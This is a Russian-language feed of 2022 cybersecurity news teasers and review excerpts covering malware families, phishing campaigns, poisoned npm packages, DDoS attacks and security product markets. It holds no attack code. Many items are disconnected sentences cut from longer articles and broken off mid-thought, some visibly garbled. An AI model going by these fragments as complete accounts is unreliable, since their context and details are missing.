Минцифры анонсировало перечень IT-специальностей для отсрочки от призываAlexander AntipovМинцифры подготовило 75 специальностей для отсрочки от срочной службыМинцифры 26 сентября, должно утвердить примерный перечень IT-специальностей и направлений подготовки, который даст право на отсрочку от призыва в рамках частичной мобилизации.

Максут Шадаев: «Мы говорим, что на момент призыва или на момент формирования списков сотрудник должен работать в указанных организациях, нет требований по стажу – это действовало в рамках отсрочки от срочной службы.

У нас есть 75 специальностей из форм для отсрочки от срочной службы, мы понимаем, что этот список достаточно узкий, чтобы удовлетворить компании, пол…

Сотрудники кибердепартамента СБУ ликвидировали банду хакеров, похитившую около 30 млн аккаунтовAlexander AntipovЗлоумышленники заработали около 14 млн гривен на продаже украденного.

Кибердепартамент Службы безопасности Украины (СБУ) ликвидировал группу хакеров, которая украла аккаунты около 30 миллионов человек.

Банда выставляла украденные аккаунты на продажу в дарквебе, и, по данным СБУ, заработала на продаже почти 14 миллионов гривен.

Чтобы собрать такое количество данных, злоумышленники активно распространяли вредоносное ПО в украинских и европейских системах.

В настоящее время хакерам грозит обвинение по по ч.

Функция новой Windows 11 22H2, которую нужно использовать каждомуAlexander AntipovТеперь Windows 11 предупреждает, когда вы вводите пароль на фишинговом сайте.

Недавно была выпущена Windows 11 22H2, и в ней появилась новая функция безопасности под названием «Улучшенная защита от фишинга» (Enhanced Phishing Protection), которая предупреждает пользователя, когда он вводит свой пароль Windows в небезопасных приложениях или на веб-сайтах.

Microsoft обнаружит, когда вы вводите пароль Windows, а затем выдаст предупреждение с предложением удалить пароль из небезопасного файла или, если он введен на сайте, изменить пароль.

Оповещение при вводе паролей Windows в небезопасном приложенииХотя в Windows…

Троян Harly продолжает дело печально известного JockerAlexander AntipovВредонос опустошает банковские счета миллионов жертв по всему миру.

Однако, у Harly и Jocker есть отличие: первый троян содержит всю полезную нагрузку внутри приложения и различными способами расшифровывают ее для запуска, а второй – многоуровневый загрузчик, получающий полезную нагрузку с серверов злоумышленников.

После расшифровки троян собирает информацию об устройстве пользователя, в особенности о мобильной сети.

Телефон пользователя переключается на мобильную сеть, после чего троян запрашивает у командного сервера конфигурацию и список подписок, которые необходимо оформить.

Еще одна интересная особенность Harly — он…

Foundry: 90% организаций считают, что риски кибербезопасности не решаютсяAlexander AntipovСоблюдение нормативных требований, нехватка квалифицированных кадров и внешние угрозы остаются главными проблемами для организаций по всему миру.

Согласно исследованию Foundry "Приоритеты безопасности 2022", подавляющее большинство (90%) руководителей служб безопасности считают, что их организации не справляются с рисками кибербезопасности.

Они также признали, что их компания не инвестирует в средства для устранения рисков (26%).

Организации всех размеров признают риски безопасности и понимают последствия, которые могут возникнуть из-за взлома, и многие руководители служб безопасности готовятся к наиху…

Обнаружена новая группировка высококвалифицированных хакеровAlexander AntipovКиберпреступники обладают сильными инструментами и обходят защиту во время атаки.

Исследователи SentinelLabs обнаружили ранее неизвестную группировку Metador, которая нацелена на телекоммуникационные компании, интернет-провайдеров и университеты в нескольких странах Ближнего Востока и Африки.

SentinelLabs обнаружила две вредоносные программы для Windows «metaMain» и «Mafalda», а также доказательства существования дополнительного импланта Linux.

Команды включают:операции с файлами;чтение содержимого каталогов;манипулирование реестром;разведку сети и системы;передачу данных на сервер управления и контроля (C& C ).

Ан…

Разработчики игр эвакуируют сотрудников из РоссииAlexander AntipovКомпании заказывают чартерные рейсы для вывоза сотрудниковСтудии разработки видеоигр начали вывозить сотрудников из России после объявления частичной мобилизации.

Как сообщается, одна из компаний заказала чартер для вывоза из РФ около 100 своих сотрудников-мужчин, которые могут быть мобилизованы, вместе с семьями.

Те студии, что не могут вывезти своих специалистов за рубеж, пытаются удержать их через правила брони для IT-компаний.

Однако, издание отмечает, что в студиях разработки также трудятся художники и дизайнеры, которые не являются айтишниками и не попадают под бронь.

Студии, которые не могут организованно вывезти сотру…

Обновление BlackCat перевернуло сектор программ-вымогателейAlexander AntipovRaaS-модель может исчезнуть, а хакеры будут просто уничтожать файлы.

Группировка BlackCat обновила свое ПО для кражи данных Exmatter и добавила новую функцию повреждения данных, кардинально изменив тактику атак аффилированных лиц.

Эта тактика использования данных из одного извлеченного файла для повреждения другого файла может быть попыткой уклониться от обнаружения или эвристического анализа.

При обычном шифровании у злоумышленников есть риск того, что жертва найдет способ расшифровки данных и не заплатит выкуп.

Эти факторы приводят к тому, что аффилированные лица отказываются от RaaS-модели в пользу программ-вымог…

Хакеры, стоящие за атакой на Colonial Pipeline, обновили свое ПО и прекратили работать с партнерамиAlexander AntipovВымогатель получил новые функции и теперь представляет большую угрозу для организаций по всему миру.

Программа-вымогатель Darkside приобрела известность в мае 2021 года, когда она была использована в разрушительной атаке на крупнейшую трубопроводную систему США Colonial Pipeline.

Exmatter постоянно совершенствуется и может извлекать файлы через FTP, SFTP или WebDav.

Noberus также может использовать инфостилеры для получения учетных данных от ПО для резервного копирования Veeam, продукта для защиты данных и аварийного восстановления, используемого многими организациями для хран…

Anonymous объявили кибервойну Ирану из-за протестовAlexander AntipovВ ответ на отключения сети в стране хакеры отключают правительственные сайты.

21 сентября хакеры Anonymous запустили кампанию OpIran (Operation Iran) против Ирана из-за продолжающихся протестов в стране.

Во время протестов в стране несколько раз наблюдались нарушение работы интернета и полное отключение мобильной сети.

Anonymous объявили войну иранскому правительству и начали проводить кибератаки на правительственные веб-сайты, в том числе принадлежащие иранской разведке и полиции.

Ранее хакеры Anonymous в ходе кампании OpRussia опубликовали более 1ТБ переписок нескольких крупных российских компаний

Шифрование каналов связи для различных сфер деятельности на конкретных примерахAlexander AntipovПрисоединяйтесь к вебинару, где обсудим вопросы построения и эксплуатации защищенных сетей.

29 сентября в 11:00 (МСК) «РТК-Солар» приглашают вас принять участие в бесплатном вебинаре, на котором обсудим вопросы построения и эксплуатации защищенных сетей для различных компаний с помощью сервиса шифрования каналов связи ГОСТ VPN.

В рамках вебинара спикеры поделятся опытом реализации проектов по организации защищенного взаимодействия между геораспределенными площадками.

На вебинаре:Рассмотрим задачи защиты каналов связи, которые стоят перед организациямиРазберем критерии выбора архитектуры решенияОб…

Злоумышленники крадут GitHub-аккаунты, подделывая уведомления от CircleCIAlexander AntipovЦель злоумышленников – кража учетных данных и кодов двухфакторной аутентификации.

Совсем недавно GitHub выпустила предупреждение о фишинговой кампании, целью которой является кража учетных данных и кодов двухфакторной аутентификации (2FA) пользователей.

О начале кампании стало известно 16 сентября 2022 года, когда пользователям начали приходить фейковые сообщения якобы от CircleCI.

Оба способа ведут на одну и ту же страницу, похожую на страницу входа в GitHub.

Она используется злоумышленниками для кражи учетных данных и одноразовых паролей, сгенерированных по алгоритму TOTP (Time-based one-time Passwor…

США усиливает системы ядерного оружияAlexander AntipovСчетная палата США заявила, что IT-системы ядерного оружия США могут стать мишенями кибератак.

Согласно новому отчету, Национальное управление по ядерной безопасности (NNSA) и его подрядчики стали чаще использовать передовые компьютеры и цифровые системы для:интеграции информационных систем в ядерное оружие;автоматизации производственного оборудования;компьютерного моделирования при разработке оружия.

В отчете отмечается, что в традиционной IT-среде, которая включает в себя компьютерные системы для проектирования оружия, NNSA полностью реализовала 4 из 6 методов.

Подрядчики обязаны контролировать состояние кибербезопасности субподрядчико…

В России мошенники предлагают гражданам оформить отсрочку от мобилизацииAlexander AntipovСреди прочих услуг - помощь с выездом за пределы России и получение документов в европейском вузе.

В России в связи с введением частичной мобилизацией появились объявления, в которых предлагается выезд из страны, оформление документов другой страны или «белого билета».

Оформление отсрочки от мобилизации («белого билета») оказалось самой популярной услугой.

При этом на все услуги злоумышленники устанавливают огромные цены и заявляют, что в них уже заложена скидка.

Так, стоимость «выезда» за пределы России составляет 3 тысячи долларов, стоимость «белого билета» - 1200 долларов, а за документы студента евр…

MaxPatrol SIEM обнаруживает продвинутые способы маскировки злоумышленниковAlexander AntipovMaxPatrol SIEM получил обновление экспертизы для выявления техник сокрытия злоумышленников и признаков работы популярных хакерских инструментов.

Система мониторинга событий информационной безопасности MaxPatrol SIEM получила обновление ранее загруженных пакетов экспертизы для выявления техник сокрытия злоумышленников и признаков работы популярных хакерских инструментов .

Злоумышленники постоянно модифицируют свои инструменты, техники и методы атак, а также разрабатывают новые способы обхода средств защиты и сокрытия своего присутствия в инфраструктуре скомпрометированных компаний.

Они позволяют пользо…

Сервис DuckDuckGo Email для защиты электронных писем от трекеров и слежки стал публичным после завершения годичного цикла бета-тестирования.

Сервис DuckDuckGo Email в действииАнализ закрытого бета-тестирования DuckDuckGo показал, что приблизительно 85 % электронных писем содержат скрытые трекеры.

Если полученное письмо требует обязательного обратного ответа, то он будет отправляться с прокси-адреса от DuckDuckGo, что позволяет не раскрывать основной ящик.

ВыводыНовый сервис DuckDuckGo Email помогает избавить личный адрес электронной почты от отслеживания.

С практической точки зрения сервис DuckDuckGo Email будет полезен, например, при получении писем от мошенников.

В июле 2022 года в линейке кибериммунных шлюзов появился второй продукт — Kaspersky IoT Secure Gateway 1000.

Киберугрозы в России в 2021 годуО развитии киберугроз в России рассказал Александр Гостев, главный технологический эксперт «Лаборатории Касперского».

Главные атаки были связаны с попытками размещения программ-шпионов и ПО для скрытого майнинга криптовалют.

Ландшафт киберугроз в России в первом полугодии 2022 года (Kaspersky)«В ближайшие несколько лет нам надо сохранить актив тех ресурсов, которые мы уже используем.

Если не обучать персонал должным образом и не быть в курсе актуальных угроз, то предприятие останется лёгкой мишенью», — подвёл итог Владимир Дащенко.

Алексей Новиков отметил масштабное развёртывание инфраструктуры для реализации DDoS-атак, появление многочисленных сайтов-редиректов, применение управления через скрипты.

Самым действенным инструментом защиты были признаны брандмауэры для веб-приложений (WAF), но совсем мало компаний могли применить их в своей инфраструктуре.

Алексей Новиков отметил также новую возможность блокировки DDoS-трафика на уровне сервиса, выстроенного Роскомнадзором для прекращения доступа к запрещённым сайтам.

Подобные операции являются наиболее опасными, потому что украденные данные становятся отправной точкой для новых инцидентов и дальнейших атак, отметил Алексей Новиков.

Он отметил, что полученный опыт против…

Участники дискуссии в эфире AM Live«Золотое» время для российских SIEM наступило…Ещё в начале февраля российский рынок SIEM был представлен как российскими решениями, так и западными.

Во-первых, западные вендоры не отключали своих SIEM в России, поэтому у российских компаний ещё есть время, чтобы подумать и выбрать».

Максим Степченков (RuSIEM) отмечает преимущество российских SIEM в виде готовности их разработчиков адаптировать / достраивать решения до требований заказчика.

По мнению Ильи Маркелова («Лаборатория Касперского»), для российских вендоров нет задачи создать точный аналог IBM QRadar или Micro Focus ArcSight.

Но в российских SIEM не учитывается, что большинство собираемых ими данн…

ВведениеКиберразведка (Threat Intelligence) — это один из наиболее сложных и в то же время важных элементов ИБ в компании.

Стратегический уровень позволяет оценить, в каких приоритетных направлениях следует развивать ИБ в компании», — рассказал Дмитрий Шестаков (Group-IB).

Как уже было отмечено, степень внедрения TI в компании сильно зависит от уровня зрелости реализованных в ней процессов.

Threat Hunting и Threat IntelligenceНаличие TI является важным элементом работы команды проактивного поиска угроз (Threat Hunting), отвечающей за обнаружение следов взлома или функционирования вредоносных программ.

Второй тренд — TI в будущем будет входить в экосистему более крупных, интегрированных плат…

Однако уже сейчас сформировались основные лидеры рынка, хорошо зарекомендовавшие себя как эксперты и разработчики ПО по форензике.

Обзор отечественного рынка решений по расследованию инцидентовElcomsoft Premium Forensic BundleElcomsoft Premium Forensic Bundle представляет собой полный набор инструментов для компьютерной и мобильной криминалистики.

Более 20 решений для мобильной криминалистики и ПО для снятия парольной защиты составляют Premium Forensic Bundle.

Обзор зарубежного рынка решений по расследованию инцидентовAutopsyAutopsy — это платформа цифровой криминалистики и графический интерфейс для различных цифровых криминалистических инструментов от компании Basis Technology.

Выбор модул…

Это и накопление излишних прав доступа, и несанкционированное использование этих прав, и нарушения парольной политики, и кражи, и разглашение конфиденциальной информации.

Подход ко внедрению IdM в российских организациях — кардинально иной.

К сожалению, часто оказывается, что подключаемая к IdM информационная система не имеет интерфейсов взаимодействия; в таком случае эти интерфейсы разрабатываются в рамках внедрения IdM.

Если замещаемое IdM-решение управляет доступом во множестве информационных систем, можно реализовать универсальный коннектор, который позволит подключать практически любую ИС к IdM.

Ведь доработка какого-либо модуля в IdM под индивидуальные требования заказчика всегда треб…

Самый эффективный способ испытать слабые места в ИТ-инфраструктуре компании до того, как это сделают киберпреступники, — киберучения по информационной безопасности.

Среди них — ответственность первых лиц компаний за киберинциденты, установленная указом Президента «О дополнительных мерах по обеспечению информационной безопасности РФ», и другой указ Президента — «О мерах по обеспечению технологической независимости и безопасности критической информационной инфраструктуры РФ», и новые, более жёсткие, требования регуляторов.

Компании же смогут выбирать сроки участия и варианты отрабатываемых сценариев: от мониторинга и расследования инцидентов до реагирования и построения систем защиты.

Киберуч…

Для этого можно внедрить DevSecOps; процесс позволит связать разработку и безопасность, и в результате программное обеспечение будет проверяться и тестироваться на наличие уязвимостей на каждом этапе его создания.

Вместе разберёмся, на какие параметры инструмента нужно обращать внимание и какие продукты сейчас доступны на рынке.

В процессе выбора сканера полезно составить список того, что может импортировать каждый инструмент, и подумать, получится ли встроить это в процесс.

Скорость сканированияЭтот параметр также важен, особенно если проверки интегрированы в разработку: они могут тормозить процесс и в результате приводить к тратам времени и денег.

Сканер в процессе анализа отправляет мног…

Эксперты российского рынка обсудили вопросы связанные с развитием российского рынка сетевых песочниц (Network Sandbox).

Для обсуждения вопросов выбора сетевых песочниц и оценки их эффективности были приглашены ведущие эксперты российского рынка:Александра Савельева , исполнительный директор «АВ Софт».

Участники дискуссии в эфире AM LiveСценарии использования сетевых песочниц«Масштабы использования сетевых песочниц меняются, — заявил Сергей Осипов (Positive Technologies).

Сетевые песочницы Open Source, on-premise, облачныеПомимо традиционных локальных (on-premise) сетевых песочниц на рынке доступны облачные решения, а также условно бесплатные продукты с открытым исходным кодом.

Варианты инте…

Не так давно мы обсуждали то, какие меры по защите от целевых атак применяются в наше время, в эфире АМ Live «Защита от целевых атак на российские организации».

Интеграция брандмауэра веб-приложений в систему защиты от целевых атак, позволяющая повысить уровень защиты крупных инфраструктур, в которой присутствуют публичные веб-серверы.

Преимущества Deep Discovery:Широкий набор специализированных модулей, разработанных специально для защиты от целевых атак.

Увеличение числа целенаправленных атак и развитых устойчивых угроз (APT) требует новых средств защиты для сохранения высокого уровня безопасности информационных систем.

Отечественный рынок защиты от целевых атак пока представлен всего нес…

Документооборот, включая медицинские карты, в нашей стране в основном является бумажным, что также создаёт опасность утечек данных, в том числе методом фотографирования документов.

Согласно исследованию InfoWatch, почти 80 % утечек в сфере розничной торговли в 2019 году произошли по вине внутренних нарушителей, главными виновниками утечек в 65 % случаев выступили рядовые сотрудники.

Медицина и фармакология: информация о состоянии здоровья пациентов и участников клинических испытаний, медицинские карты, ноу-хау (например, информация о составе и компонентах новых лекарств и вакцин).

информация о состоянии здоровья пациентов и участников клинических испытаний, медицинские карты, ноу-хау (напри…

Интеграция систем защиты от утечек конфиденциальной информации (Data Leak Prevention, DLP) и ряда ИБ-решений может оказаться очень полезной для информационной безопасности компании, упростить рутину и дать новые возможности.

Интеграции взаимодействияЭти интеграции ориентированы непосредственно на обработку сообщений DLP и внешней системой, а также на получение данных, необходимых для этого.

Возможны два основных варианта такого рода интеграций: инициируемые со стороны DLP (DLP — ведущий) и инициируемые внешней системой (когда DLP — ведомый).

Внешние сервисыВнешние сервисы позволяют DLP-системе получать дополнительную информацию о сообщении (или о его частях) или обрабатывать его.

Важно отме…

Впрочем, это не означает, что в случае возникновения DDoS-атаки не следует предпринимать никаких действий.

В то же время если срабатывания не ведут к нанесению ущерба, но повторяются, то это может быть признаком прихода хакеров.

Их интересы отчасти противоположны: «ИТ-департамент знает, как технически устроена инфраструктура компании, в то время как департамент ИБ знает, в каком контексте надо рассматривать ИТ-активы».

«Если у заказчика внедрена платформа Digital Diaries, которая помогает в исследовании активности внутри программной среды, то это сильно помогает в раскрытии инцидента.

«В этом случае, — отмечает Руслан Ложкин, — лучше ничего не трогать в инфраструктуре и сразу обратиться в ю…

По оценке независимой исследовательской и консалтинговой компании Frost & Sullivan, TLS-сертификаты от GlobalSign обеспечивают максимально надёжное шифрование. В том числе за это GlobalSign получила в сентябре 2022 года награду 2022 Global Competitive Strategy Leadership Award. Но возникает вопрос, чем же отличается шифрование в разных сертификатах? В частности, какие алгоритмы используются для криптографической подписи? Читать дальше →

В первой части мы рассказали о нескольких самых ранних из известных компьютерных вирусов на заре их зарождения. Теперь мы расскажем о вирусах на рубеже 80-х и 90-х годов. Это время стало эпохой не только колоссальных политических перемен, но и превращения вирусов из творений отдельных энтузиастов в предмет массового увлечения для одних и огромную проблему для других. Читать дальше →

Дело в том, что и разработчики, и архитекторы, и DevOps-инженеры, и тестировщики тоже люди, которым свойственно ошибаться, из-за чего и появляются уязвимости в безопасности и лазейки для злоумышленников.

Secure SDLCМы подходим к симбиозу работы сотрудников ИТ и ИБ, и фреймворку, который описывает их слаженную работу по созданию функционального и безопасного ПО — Secure SDLC.

Для этого должны быть прозрачные и понятные процессы взаимодействия подразделений ИТ и ИБ – и в том числе понятные для подразделения бизнес-заказчика.

В таком случае, при взаимодействии ИТ и ИБ появляется третья независимая сторона, которая предотвращает конфликты интересов ИТ и ИБ.

Все эти задачи помогают разработке и …

/ Unsplash.com / Lujia ZhangЗнай свое окружениеЗа последний год выросло число атак на критическую инфраструктуру и сети компаний — по некоторым оценкам, на целых 32%.

Важная часть тестирования на проникновение — сбор данных о сети и инфраструктуре и операционных системах.

Такой анализ как раз позволяет провести утилита p0f.

Однако возраст все же сказывается — один из резидентов Hacker News говорит, что в работе утилиты встречаются ошибки.

Однако это инструмент активного фингерпринтинга, то есть он сам сканирует объекты в сети (порты и соответствующие им службы).

Недавно мне довелось участвовать в хакатоне по информационной безопасности на научной конференции в прекрасном городе Санкт-Петербург в СПбГУТ.

Одно из заданий представляло из себя написание собственного сканера уязвимостей на любом ЯП с условиями, что использование проприетарного ПО и фреймворков запрещено.

Подумав, мы решили, что развернуть зеркала баз уязвимостей для дальнейшего парсинга - это хорошая идея (как в конце и оказалось).

За основу был взят парсер CVE, где выводится все CVE, в которых упоминается строчка, которую ты укажешь (https://github.com/stratosphereips/nist-cve-search-tool).

Скрин одного из cve по osqueryЭто и решено было парсить.

Ведь я за вас уже постарался и проинвестировал свое время в это дело и теперь вы с этим справитесь за считанные минуты.

На третий вопрос уж как нибудь сами, а вот в первый немного углубимся.

понятно что это далеко не все что может дать нам Yubikey, но мы тут не возможности обозреваем, а проблему решаем!)

#Проверяем версию sudo apt-cache policy pamu2fcfgЕсли таковой не наблюдается, скачиваем архивом или подключаем репозиторий ubuntu 20.04 и скачиваем ее от туда.

Репозитории так-же оставлю тут.. sudo nano /etc/apt/sources.list deb http://archive.ubuntu.com/ubuntu/ focal main restricted universe multiverse deb-src http://archive.ubuntu.com/ubuntu/ focal main restricted universe multiverse deb …

Как он появился и как снимался второй сезон нашего мини-сериала, рассказывали ранее.

Четырнадцатая серия второго сезона ITить-КОЛОТИТЬ – "Голый рабочий день"Как получить повышение?

К чему это может привести, способны ли эникеи раздеваться за деньги и чем опасно старое (не обновлённое вовремя) резюме, рассказываем в новой серии.

Пятнадцатая серия второго сезона ITить-КОЛОТИТЬ – "Корпоративный шпионаж"Корпоративный шпионаж — это серьёзная проблема.

И есть ли он вообще?

Далее пользователи получали еще одно сообщение с якобы ответом на тикет от сотрудника поддержки студии.

В послании содержался исполняемый файл, запакованный в архив, который мошенники выдавали за новое клиент-приложение для игр.

ИБ-компании дали рекомендации по защите от атаки MFA FatigueАтака MFA Fatigue — это сценарий, в котором злоумышленник пытается войти в систему с многофакторной аутентификацией с помощью украденных учетных данных, вызывая бесконечный поток push-запросов MFA на мобильном устройстве владельца.

Злоумышленники связываются с целевыми пользователями, например, выдавая себя за работников технической поддержки, чтобы убедить пользователя принять приглашение MFA.

Проверка пра…

Отечественный рынок кибербезопасности испытывает как никогда острую потребность в новых квалифицированных кадрах: согласно исследованию Positive Technologies, число кибератак постоянно растет.

Что в работе сотрудника SOC первой линии чаще всего составляет львиную долю работы?

Наставниками стажеров стали шесть сотрудников, давно работающих в SOC и непосредственно участвующих в ежедневном мониторинге.

Но мы не планировали ограничивать практическую часть стажировки работой с IRP и собирались постепенно вводить их в полноценный мониторинг с использованием других наших продуктов.

Теоретическая часть: обучениеБезусловно, мы рассматривали стажировку не только как источник практического опыта для р…

И все это в довольно консервативной команде, которая создает серьезные корпоративные ИБ-продукты.

Я понял, что я в этом смысле нормальный, но не суперзвезда.

Уезжать за границу я не хотел, потому что у меня здесь были друзья, семья, будущая жена.

Я подумал: «Ну, что я умею?

Но я считаю, что если делать людей счастливыми, то все, что от меня хочет руководство, будет выполнено.

OPC Complex Data — предоставляет дополнительные спецификации к OPC DA и XML-DA, которые позволяют серверам работать со сложными типами данных, такими как бинарные структуры и XML-документы.

Пример коммуникации OPC DAАспекты безопасности OPC DAOPC-сервер может реализовывать один из трех уровней безопасности:Безопасность отключена – отсутствуют средства обеспечения безопасности.

Сервер OPC может реализовать безопасность OPC в дополнение к безопасности DCOM или реализовать только безопасность OPC.

Реализуя спецификацию безопасности OPC на сервере OPC, программист может сделать доступ к отдельным объектам и интерфейсам в зависимости от списков контроля доступа.

ЗаключениеВ данном материале был …

После того как собрана выборка TSamples, могут быть извлечены значения характеристик ресурсов для построения их сигнатур.

Пусть f 1 и f 2 будут значениями из FValues er 1 и er 2 соответственно.

Эти ресурсы образуют мультисет relevant_resources = {r 2 , r 3 , r 3 , r 4 , r 5 , r 5 , r 6 , r 7 , r 7 } и обозначены затонированной областью на рисунке.

Основываясь на этом факте, можно сделать вывод, что ресурс er 2 может быть посещен из w 3 , либо из w 4 , либо из w 5 , но не из w 1 или w 2 .

В этом примере r 4 , r 5 и r 7 не изменились.

В Windows 11 22H2, вышедшей на прошлой неделе, появилась новая защитная функция под названием «Улучшенная защита от фишинга» (Enhanced Phishing Protection), которая предупреждает пользователей, если те вводят свой пароль от Windows в небезопасных приложениях или на сайтах.

В настоящее время новая функция доступна только в Windows 11 22H2 и пока не включена по умолчанию.

Для ее активации требует войти в Windows со своим паролем, а не использовать Windows Hello.

Журналисты издания Bleeping Computer пишут, что протестировали новинку в деле, и вводили пароль в WordPad, Microsoft Word 2019, Excel 2019, OneNote и Notepad2.

Windows 11 предупредила журналистов о небезопасности сохранения пароля в W…

Компания Sophos выпустила патч для критического бага в Sophos Firewall и предупредила, что проблему уже взяли на вооружение хакеры.

Уязвимость связана с внедрением кода и используется в основном для таргетированных атак на организации в регионе Южной Азии.

В Sophos подчеркнули, что уже уведомили о происходящем всех пострадавших.

Уязвимость, получившая идентификатор CVE-2022-3236, была обнаружена в User Portal и веб-админке Sophos Firewall.

При этом пользователям более старых версий Sophos Firewall придется обновиться до актуальной версии, чтобы получить патч для CVE-2022-3236.

Неизвестные злоумышленники скомпрометировали аккаунт одного из разработчиков криптовалютной биржи dYdX и внедрили вредоносный код в несколько пакетов npm, которые, помимо самой dYdX, используют как минимум 44 криптовалютных проекта.

На проблему обратил внимание создатель Diffend.io Мацей Менсфельд (Maciej Mensfeld) из компании Mend.

Он сообщил, что обнаружил несколько скомпрометированных пакетов npm, которые тайно устанавливали на машины жертв инфостилеры.

Основная проблема заключается в том, что эти пакеты используются не только самой dYdX, но и 44 другими криптовалютным проектами.

Неудаленной осталась лишь версия [email protected], но Чоу пишет, что это «временное упущение» со стороны npm.

Павел Дуров сообщил, что по требованию Apple для пользователей iOS были заблокированы несколько связанных с Белоруссией русскоязычных каналов, на которые в общей сложности были подписаны более 80 000 человек.

«По требованию Apple, мы заблокировали на iPhone/iPad несколько связанных с Белоруссией русскоязычных каналов суммарной численностью в 80 тысяч подписчиков.

Администраторы еще нескольких подобных каналов общей численностью в 50 тысяч подписчиков получили предупреждения от нашей команды о том, что они нарушают правила Apple», — рассказывает Дуров в своем Telegram-канале.

По его словам, администраторам, которые получают предупреждения от Telegram, нужно воспринимать их всерьез и старатьс…

Подросток был арестован в Оксфордшире, в рамках расследования некого взлома, которое проводится при поддержке Национального агентства по борьбе с преступностью и Национального подразделения по борьбе с киберпреступностью.

ИБ-эксперты уверены, что задержанный ответственен за взломы компаний Uber и Rockstar Games.

Напомню, что из-за атаки на Rockstar Games в сеть утекли десятки видео с геймплеем GTA VI и куски исходных кодов компании.

Вскоре многие ИБ-эксперты и известный журналист Мэтью Киз (со ссылкой на собственные источники) предположили, что задержанный стоял за недавними громкими взломами компаний Uber и Rockstar Games.

В начале текущего года эти пар­ни шан­тажиро­вали Nvidia, слили исх…

В минувшие выходные издание «Коммерсант», со ссылкой на собственные источники в отрасли, сообщило о мощной DDoS-атаке на российскую платежную систему «Мир» и ее оператора Национальную систему платежных карт (НСПК).

Журналисты пишут, что целью атаки была попытка перегрузка системы, то есть хакеры стремились вызвать сбой в обслуживании карт.

По информации издания, за атакой стояли проукраинские хактивисты, которые «генерируют трафик на системы с помощью браузеров или примитивных DDoS-инструментов, с целью вызвать перебои в прохождении платежей и работе терминалов».

В одной из неназванных профильных компаний «Коммерсанту» сообщили, что из-за таких атак эквайринг карт может не работать до неско…

Оказалось, что злоумышленники управляют большой сетью, состоящей более чем из 200 фальшивых сайтов знакомств и поддержки клиентов, и используют эти ресурсы для списания средств с чужих банковских карт, купленных в даркнете.

В рамках этой кампании используются два вида доменов: сайты знакомств и порталы поддержки клиентов (списки адресов можно найти в отчете компании).

При этом сами сайты знакомств и поддержки клиентов выглядят рабочими, но не получают практически никакого трафика, занимая низкие позиции в результатах поиска Google.

Дело в том, что они существуют не для привлечения пользователей, а чтобы служить каналами для отмывания денег.

Большинство карт принадлежат жителям США, но также…

Специалисты ReversingLabs обнаружили вредоносный npm-пакет, маскирующийся под легитимную библиотеку CSS-фреймворка Material Tailwind.

Material Tailwind представляет собой известный CSS-фреймворк, который рекламируется как «простая в использовании библиотека компонентов для Tailwind CSS и Material Design».

Исследователи пишут, что вредоносный пакет material-tailwindcss был загружен 320 раз, и все скачивания произошли после 15 сентября 2022 года.

Как показал дальнейший анализ, вредоносный Material Tailwind содержал автоматический скрипт, срабатывавший после установки и предназначенный для загрузки с удаленного сервера защищенного паролем ZIP-архива (чтобы избежать антивирусных проверок).

Иссл…

Стало известно, что вышедшее на этой неделе обновление Windows 11 22H2 вызывает проблемы с игровой производительностью в системах с графическими процессорами Nvidia.

По их словам, проблема выглядит как беспричинное снижение загрузки на ЦП, которое возникает после установки обновления Windows 11 2022.

«Я только что обновился до 22H2, и у меня крайне нестабильный FPS во всех играх.

Совершенно новый ПК, и до этого обновления он работал нормально.

Пока разработчики рекомендуют всем пострадавшим от обновления до Windows 11 22H2 предоставить дополнительные детали произошедшего.

Описывай действия, а не объектыЕс­ли ты прос­то возь­мешь и опи­шешь какую‑то вещь (про­токол, фор­мат, устрой­ство), то получит­ся скуч­ная справ­ка, а не статья.

Ес­ли и пос­ле это­го мысль не приш­ла, то задумай­ся: какой информа­ции тебе может не хва­тать, что­бы про­дол­жить?

Выкидывай все лишнееКлас­сичес­кий совет по редак­туре — убрать все, что не несет смыс­ла и не помога­ет рас­крыть тему.

Записывай идеиЧто, если ты пишешь что‑то одно, а в голову при­ходит мысль, которая отно­сит­ся к сов­сем дру­гой час­ти статьи?

Мы ста­раем­ся доводить тек­сты до ума силами редак­ции или хотя бы совету­ем, что и как улуч­шить.

ИБ-специалист Энди Нгуен (Andy Nguyen), также известный под ником theflow0, обнаружил, что в PlayStation 5 присутствовала уязвимость, которая еще в 2021 году была исправлена в консолях PlayStation 4.

Напомню, что в прошлом году Нгуен намекал, что ему удалось осуществить джейлбрейк своей PlayStation 5.

Он также подчеркнул, что не хочет винить разработчиков Sony в повторном появлении бага, потому порой такое просто случается.

На этой неделе Sony исправила уязвимость в PlayStation 5, а Нгуен получил от компании награду в размере 10 000 долларов США (столько же Нгуен получил в качестве вознаграждения в 2021 году).

Теперь исследователь объясняет, что обнаруженная уязвимость была лишь одним звено…

Оказалось, что после сброса пароля от учетной записи активные сеансы на устройствах под управлением Android и iOS не закрывались.

Известно, что ошибка возникла еще в прошлом году, в результате внесения изменений в системы, отвечающие за сброс пароля.

«Это значит, что если вы изменили свой пароль на одном устройстве, но имели открытую сессию на другом устройстве, эта сессия, вероятно, не была завершена.

Ведь это означает, что даже после смены пароля третьи лица могли сохранить доступ к их учетным записям, а пользователи даже не подозревали об этом.

Из-за этих рисков компания уведомила о баге всех пострадавших и принудительно разлогинила их, завершив все активные сеансы на всех устройствах.

Специалисты «Лаборатории Касперского» обнаружили в Google Play трояна, схожего с уже известным семейством малвари Joсker.

Новый вредонос получил имя Harly, и сообщается, что с 2020 года было обнаружено более 190 приложений, зараженных этой малварью.

Как и в случае Jocker, трояны семейства Harly имитируют легитимные приложения.

Фактически это означает, что злоумышленники скачивают обычные приложения из Google Play, внедряют в них вредоносный код, после чего снова загружают их в магазин приложений под другим именем.

Малварь из рассмотренного примера работает только с тайскими операторами, поэтому проверяет MNC (коды мобильной сети) — уникальные идентификаторы операторов связи.

Такие поддельные сообщения информируют получателей об изменениях в политике конфиденциальности и условиях использования, из-за чего людям якобы необходимо войти в свою учетную запись на GitHub и принять изменения.

Как нетрудно догадаться, цель злоумышленников — хищение учетных данных от GitHub и кодов двухфакторной аутентификации, которые передаются атакующим через обратные прокси.

В CircleCI подчеркивают, что сервис никогда не стал бы просить пользователей ввести учетные данные для просмотра изменений в политике конфиденциальности и условиях использования.

Если же скомпрометированная учетная запись имеет высокие привилегии, хакеры создают новые учетные записи, чтобы в будущем сохранить дос…

Аналитики Recorded Future заметили, что хакеры используют контейнеры Google Tag Manager (GTM) для внедрения электронных скиммеров, которые затем воруют данные банковских карт и личную информацию покупателей на e-commerce сайтах.

GTM используется на тысячах сайтов для сбора различных метрик, отслеживания клиентов и прочих маркетинговых целей.

